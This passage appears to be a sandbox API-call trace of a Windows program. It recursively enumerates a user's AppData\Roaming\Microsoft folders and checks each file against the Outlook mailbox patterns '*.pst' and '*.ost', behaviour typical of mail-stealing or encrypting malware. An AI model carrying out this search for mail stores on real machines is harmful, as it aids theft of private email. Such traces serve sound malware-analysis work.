returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033" [0251.381] PathCombineW (in: pszDest=0x235cff0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*" [0251.381] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*", lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 0x4406e00 [0251.381] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.381] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.381] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.381] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 0 [0251.381] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.381] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0 [0251.382] FindClose (in: hFindFile=0x4406a40 | out: hFindFile=0x4406a40) returned 1 [0251.382] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0 [0251.382] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.382] FindNextFileW (in: hFindFile=0x5c0efb0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0251.382] FindClose (in: hFindFile=0x5c0efb0 | out: hFindFile=0x5c0efb0) returned 1 [0251.382] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0251.382] FindClose (in: hFindFile=0x5c0ee90 | out: hFindFile=0x5c0ee90) returned 1 [0251.382] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.382] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.382] PathMatchSpecW (pszFile="Normal.dotm", pszSpec="*.pst") returned 0 [0251.382] PathMatchSpecW (pszFile="Normal.dotm", pszSpec="*.ost") returned 0 [0251.382] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.382] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.382] PathMatchSpecW (pszFile="Process Map for Basic Flowchart.xltx", pszSpec="*.pst") returned 0 [0251.382] PathMatchSpecW (pszFile="Process Map for Basic Flowchart.xltx", pszSpec="*.ost") returned 0 [0251.382] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.382] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.382] PathMatchSpecW (pszFile="Process Map for Cross-Functional Flowchart.xltx", pszSpec="*.pst") returned 0 [0251.382] PathMatchSpecW (pszFile="Process Map for Cross-Functional Flowchart.xltx", pszSpec="*.ost") returned 0 [0251.382] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.382] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.382] PathMatchSpecW (pszFile="Stock symbols comparison.xltm", pszSpec="*.pst") returned 0 [0251.383] PathMatchSpecW (pszFile="Stock symbols comparison.xltm", pszSpec="*.ost") returned 0 [0251.383] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.383] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.383] PathMatchSpecW (pszFile="Welcome to Excel.xltx", pszSpec="*.pst") returned 0 [0251.383] PathMatchSpecW (pszFile="Welcome to Excel.xltx", pszSpec="*.ost") returned 0 [0251.383] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.383] FindClose (in: hFindFile=0x5c0fbb0 | out: hFindFile=0x5c0fbb0) returned 1 [0251.383] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.383] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.383] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="UProof" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof" [0251.383] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\*" [0251.383] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x4406e00 [0251.383] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.383] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.383] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.384] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.384] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.384] PathMatchSpecW (pszFile="CUSTOM.DIC", pszSpec="*.pst") returned 0 [0251.384] PathMatchSpecW (pszFile="CUSTOM.DIC", pszSpec="*.ost") returned 0 [0251.384] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.384] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.384] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.384] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.384] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Vault" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault" [0251.384] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\*" [0251.384] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x44067a0 [0251.406] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.406] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.406] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.406] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.407] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.407] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Windows" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows" [0251.407] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\*" [0251.407] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x4406e60 [0251.407] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.407] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", pszFile="AccountPictures" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures" [0251.407] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*" [0251.407] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x4407760 [0251.407] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.408] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.pst") returned 0 [0251.408] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.ost") returned 0 [0251.408] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Libraries" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Libraries" [0251.408] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Libraries", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0251.408] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x4407760 [0251.409] PathMatchSpecW (pszFile="CameraRoll.library-ms", pszSpec="*.pst") returned 0 [0251.409] PathMatchSpecW (pszFile="CameraRoll.library-ms", pszSpec="*.ost") returned 0 [0251.409] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.pst") returned 0 [0251.409] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.ost") returned 0 [0251.409] PathMatchSpecW (pszFile="Documents.library-ms", pszSpec="*.pst") returned 0 [0251.409] PathMatchSpecW (pszFile="Documents.library-ms", pszSpec="*.ost") returned 0 [0251.409] PathMatchSpecW (pszFile="Music.library-ms", pszSpec="*.pst") returned 0 [0251.409] PathMatchSpecW (pszFile="Music.library-ms", pszSpec="*.ost") returned 0 [0251.409] PathMatchSpecW (pszFile="Pictures.library-ms", pszSpec="*.pst") returned 0 [0251.409] PathMatchSpecW (pszFile="Pictures.library-ms", pszSpec="*.ost") returned 0 [0251.409] PathMatchSpecW (pszFile="SavedPictures.library-ms", pszSpec="*.pst") returned 0 [0251.409] PathMatchSpecW (pszFile="SavedPictures.library-ms", pszSpec="*.ost") returned 0 [0251.409] PathMatchSpecW (pszFile="Videos.library-ms", pszSpec="*.pst") returned 0 [0251.409] PathMatchSpecW (pszFile="Videos.library-ms", pszSpec="*.ost") returned 0 [0251.410] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Network Shortcuts" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts" [0251.410] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0251.410] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x4407760 [0251.410] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Printer Shortcuts" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts" [0251.410] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0251.410] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x44079a0 [0251.411] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Recent" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent" [0251.411] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0251.411] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x44079a0 [0251.469] PathMatchSpecW (pszFile="--xgOi.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="--xgOi.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="-bzgm01AIKA.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="-bzgm01AIKA.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="-D879mVI4tn4ERy9.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="-D879mVI4tn4ERy9.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="-YvWj1fwStG.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="-YvWj1fwStG.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="1CHzw2Rx2S_zW_tQ.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="1CHzw2Rx2S_zW_tQ.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="1o2T0sbYBt _ogxAgQ.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="1o2T0sbYBt _ogxAgQ.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="1tOTnsvy4N.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="1tOTnsvy4N.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="2F3N8mDO2tq527fPl.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="2F3N8mDO2tq527fPl.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="2kqeyeb4tK7WWT6.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="2kqeyeb4tK7WWT6.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="2QyF7ZuqsP96.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="2QyF7ZuqsP96.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="31MeeXfoCH.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="31MeeXfoCH.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="3i_Obgb9P_hr_Np.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="3i_Obgb9P_hr_Np.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="3y9-0UXlRJ9O5.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="3y9-0UXlRJ9O5.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="4bMnW0pkdROcZqCZbZ7Z.lnk", pszSpec="*.pst") returned 0 [0251.469] PathMatchSpecW (pszFile="4bMnW0pkdROcZqCZbZ7Z.lnk", pszSpec="*.ost") returned 0 [0251.469] PathMatchSpecW (pszFile="4Lo02O.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="4Lo02O.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="4MjeLfzkO.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="4MjeLfzkO.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="4Ryvuj33dWK.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="4Ryvuj33dWK.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="4u3E1axJ6c8acKig.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="4u3E1axJ6c8acKig.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="4xHiScMFN.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="4xHiScMFN.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="51XsjOR JGvaK zf w.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="51XsjOR JGvaK zf w.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="5is_ZZyj8.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="5is_ZZyj8.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="5yPyRBza14jgwbZ.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="5yPyRBza14jgwbZ.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="68QPxo2pG.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="68QPxo2pG.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="6duzYmb8BUhG_gKo.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="6duzYmb8BUhG_gKo.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="6qZ6qHJny0JO4qAx6K5.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="6qZ6qHJny0JO4qAx6K5.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="7iKnrdP.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="7iKnrdP.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="8293WcCbLbskQUhZj.lnk", pszSpec="*.pst") returned 0 [0251.470] PathMatchSpecW (pszFile="8293WcCbLbskQUhZj.lnk", pszSpec="*.ost") returned 0 [0251.470] PathMatchSpecW (pszFile="9wMyOuV5.lnk", pszSpec="*.pst") returned 0 [0251.477] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="AutomaticDestinations" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations" [0251.477] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0251.477] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x44070a0 [0251.479] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="CustomDestinations" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations" [0251.479] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0251.479] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x44064a0 [0251.526] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", pszFile="SendTo" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\SendTo") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\SendTo" [0251.526] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\SendTo", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0251.526] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x44064a0 [0251.536] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Start Menu" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu" [0251.536] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0251.536] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x44079a0 [0251.536] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="Programs" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs" [0251.536] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0251.536] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x44064a0 [0251.537] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessibility" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility" [0251.537] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*" [0251.537] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x44067a0 [0251.537] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessories" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories") 